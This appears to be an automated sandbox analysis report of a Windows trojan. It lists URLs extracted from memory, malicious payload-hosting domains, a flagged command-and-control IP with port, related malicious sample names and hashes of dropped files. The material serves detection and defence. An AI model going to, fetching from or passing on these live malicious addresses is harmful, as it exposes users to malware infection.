                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.jsonsintl.compowershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.hotspotshield.com/terms/svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.pango.co/privacysvchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.320009117.0000000004E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jsonsintl.com/powershell.exe, 00000002.00000002.320849477.00000000051F3000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318500901.000001C280045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://digitalkitchen.jp/images/PVn/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://go.micropowershell.exe, 00000002.00000003.299865395.00000000058F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000002.319452146.000001C28006A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317899105.000001C280068000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://173.82.82.196/regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • URL Reputation: malware
                                                              unknown
                                                              http://crl.ver)svchost.exe, 00000013.00000002.506283732.000002591240E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000016.00000003.412280147.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.412123410.0000019AC659A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://%s.xboxlive.comsvchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  low
                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.hotspotshield.com/svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://173.82.82.196:8080/regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • URL Reputation: malware
                                                                              unknown
                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://piffl.com/piffl.com/a/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://nakharinitwebhosting.com/HSDYKN1X5GLF/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://dynamic.tsvchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://disneyplus.com/legal.svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318593022.000001C28003A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://activity.windows.comsvchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://cmentarz.5v.pl/themes/zalMkTb/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.jsonsintl.com4powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://help.disneyplus.com.svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              low
                                                                                              https://173.82.82.196:8080/Pregsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  173.82.82.196
                                                                                                  unknownUnited States
                                                                                                  35916MULTA-ASN1UStrue
                                                                                                  98.142.105.106
                                                                                                  jsonsintl.comUnited States
                                                                                                  33182DIMENOCUStrue
                                                                                                  IP
                                                                                                  192.168.2.1
                                                                                                  127.0.0.1
                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                  Analysis ID:631940
                                                                                                  Start date and time: 23/05/202204:10:442022-05-23 04:10:44 +02:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 7m 3s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:defaultwindowscmdlinecookbook.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:34
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.win@26/11@2/4
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 51.3% (good quality ratio 27.5%)
                                                                                                  • Quality average: 32.8%
                                                                                                  • Quality standard deviation: 37.5%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 97%
                                                                                                  • Number of executed functions: 47
                                                                                                  • Number of non-executed functions: 243
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.4.86, 173.222.108.226, 173.222.108.210, 20.223.24.244, 20.49.150.241, 51.11.168.232
                                                                                                  • Excluded domains from analysis (whitelisted): a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, settings-prod-uks-1.uksouth.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, settings-prod-uks-2.uksouth.cloudapp.azure.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  TimeTypeDescription
                                                                                                  04:12:07API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                  04:12:23API Interceptor11x Sleep call for process: svchost.exe modified
                                                                                                  04:13:11API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  173.82.82.196qJhkILqiEA.dllGet hashmaliciousBrowse
                                                                                                    ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                                                      uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                                                        qJhkILqiEA.dllGet hashmaliciousBrowse
                                                                                                          kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                                                            ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                                                              uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                                                                KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                                                                  EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                                                                    kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                                                                      o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                                                                        EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                                                                          KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                                                                            o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                                                                              M7GdKu4Giv.dllGet hashmaliciousBrowse
                                                                                                                                Hr5V6ZHTKv.dllGet hashmaliciousBrowse
                                                                                                                                  M7GdKu4Giv.dllGet hashmaliciousBrowse
                                                                                                                                    Hr5V6ZHTKv.dllGet hashmaliciousBrowse
                                                                                                                                      M8WPxI5dUq.dllGet hashmaliciousBrowse
                                                                                                                                        IakisE3UQP.dllGet hashmaliciousBrowse
                                                                                                                                          98.142.105.106Gmail.zipGet hashmaliciousBrowse
                                                                                                                                          • www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          MULTA-ASN1USqJhkILqiEA.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          qJhkILqiEA.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          miori.arm7-20220522-1600Get hashmaliciousBrowse
                                                                                                                                          • 216.127.183.179
                                                                                                                                          M7GdKu4Giv.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          Hr5V6ZHTKv.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          M7GdKu4Giv.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          Hr5V6ZHTKv.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          M8WPxI5dUq.dllGet hashmaliciousBrowse
                                                                                                                                          • 173.82.82.196
                                                                                                                                          DIMENOCUSGmail.zipGet hashmaliciousBrowse
                                                                                                                                          • 98.142.105.106
                                                                                                                                          miori.armGet hashmaliciousBrowse
                                                                                                                                          • 184.171.252.89
                                                                                                                                          invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 186.227.194.58
                                                                                                                                          myp0912.exeGet hashmaliciousBrowse
                                                                                                                                          • 198.136.49.34
                                                                                                                                          http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20=Get hashmaliciousBrowse
                                                                                                                                          • 67.23.238.11
                                                                                                                                          http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20=Get hashmaliciousBrowse
                                                                                                                                          • 67.23.238.11
                                                                                                                                          http://seccl.grupotech.com.br/ioo/?e=amFjay5jdWxsaXNAc2VjY2wudGVjaA==Get hashmaliciousBrowse
                                                                                                                                          • 187.45.179.58
                                                                                                                                          YIbpw8KksnGet hashmaliciousBrowse
                                                                                                                                          • 198.136.58.131
                                                                                                                                          swift copy.exeGet hashmaliciousBrowse
                                                                                                                                          • 64.37.52.225
                                                                                                                                          documents.exeGet hashmaliciousBrowse
                                                                                                                                          • 64.37.52.225
                                                                                                                                          Invoice.exeGet hashmaliciousBrowse
                                                                                                                                          • 64.37.52.225
                                                                                                                                          Invoice.exeGet hashmaliciousBrowse
                                                                                                                                          • 64.37.52.225
                                                                                                                                          Payment Slip.exeGet hashmaliciousBrowse
                                                                                                                                          • 64.37.52.225
                                                                                                                                          Payment Slip.exeGet hashmaliciousBrowse
                                                                                                                                          • 64.37.52.225
                                                                                                                                          0Pey7zVmABGet hashmaliciousBrowse
                                                                                                                                          • 98.142.106.247
                                                                                                                                          7995387849855083251770484.lnkGet hashmaliciousBrowse
                                                                                                                                          • 138.128.170.10
                                                                                                                                          mybe.xlsmGet hashmaliciousBrowse
                                                                                                                                          • 212.18.231.208
                                                                                                                                          mybe.xlsmGet hashmaliciousBrowse
                                                                                                                                          • 212.18.231.208
                                                                                                                                          X_3333044513.xlsbGet hashmaliciousBrowse
                                                                                                                                          • 212.18.231.208
                                                                                                                                          X_3333044513.xlsbGet hashmaliciousBrowse
                                                                                                                                          • 212.18.231.208
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x94425ecd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):786432
                                                                                                                                          Entropy (8bit):0.2507183390498187
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:k+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:bSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                          MD5:65096A2375AA8E14CAE26EF5EC5DD857
                                                                                                                                          SHA1:BE53547488DD940484A11B1A9374EA56B2EC255E
                                                                                                                                          SHA-256:2F13500A394E9B7CE4C6A432A95AFBCB0D609ECE529B4F6C87418D9722C1832C
                                                                                                                                          SHA-512:EB4AEAA99D6D27BAE141735571D78D43634EA08F316F1605794FB0B529A1D73684EF407C445FF3457D0AE4573B2CC5DA9B81802A761ABCDA7B5C6F688A42A6D0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.B^.... ................e.f.3...w........................&..........w.......z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..............................................................................................................................................................................................................................................z.}................w.M......z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                          File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):61480
                                                                                                                                          Entropy (8bit):7.9951219482618905
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                                                                          MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                                                                          SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                                                                          SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                                                                          SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                                                                                          Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):330
                                                                                                                                          Entropy (8bit):3.1125006849882624
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:kKhWL3oJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:K/kPlE99SNxAhUesE1
                                                                                                                                          MD5:DCE9A004D946C87E33243DDC0185A034
                                                                                                                                          SHA1:3AA126D54B78E17FBD45801408CBF163A517E456
                                                                                                                                          SHA-256:01707486342E26E1D36659B8AEFE27FE5DC4F398469FE7D5805E3FD3DD8BCD02
                                                                                                                                          SHA-512:004513A584518D66CDB99177C7CF825142FA5F2A540482326107BF810A870BB0385D16D5229127AC8642BBD068D85F2191CD87A3C6185A14F8C96BB4799753E2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:p...... ........i....n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):19912
                                                                                                                                          Entropy (8bit):5.600422441425159
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:FtL15PvT3vVQUlt6fPQzPSBKniulSIBI9YSZraJrSU/ZzPU+Ywf:Da6YI4KiulSoyIrSMqG
                                                                                                                                          MD5:B1EB76CB3757B18702EE682758B5CA4C
                                                                                                                                          SHA1:4877F887D66EEBF412B11F5BAD363B2734E10366
                                                                                                                                          SHA-256:F7C851972C004DE468BB09048AA68F392DB92BABB881D07DF5CD643C43441308
                                                                                                                                          SHA-512:2A3E517861C1E5154FD05033537FB356DE155A8CBA15BDC92A13FE7716D0905914D02DFE521145899625AEE93BB910C327B1C23D212D933213121F619D247E0E
                                                                                                                                          Malicious:false
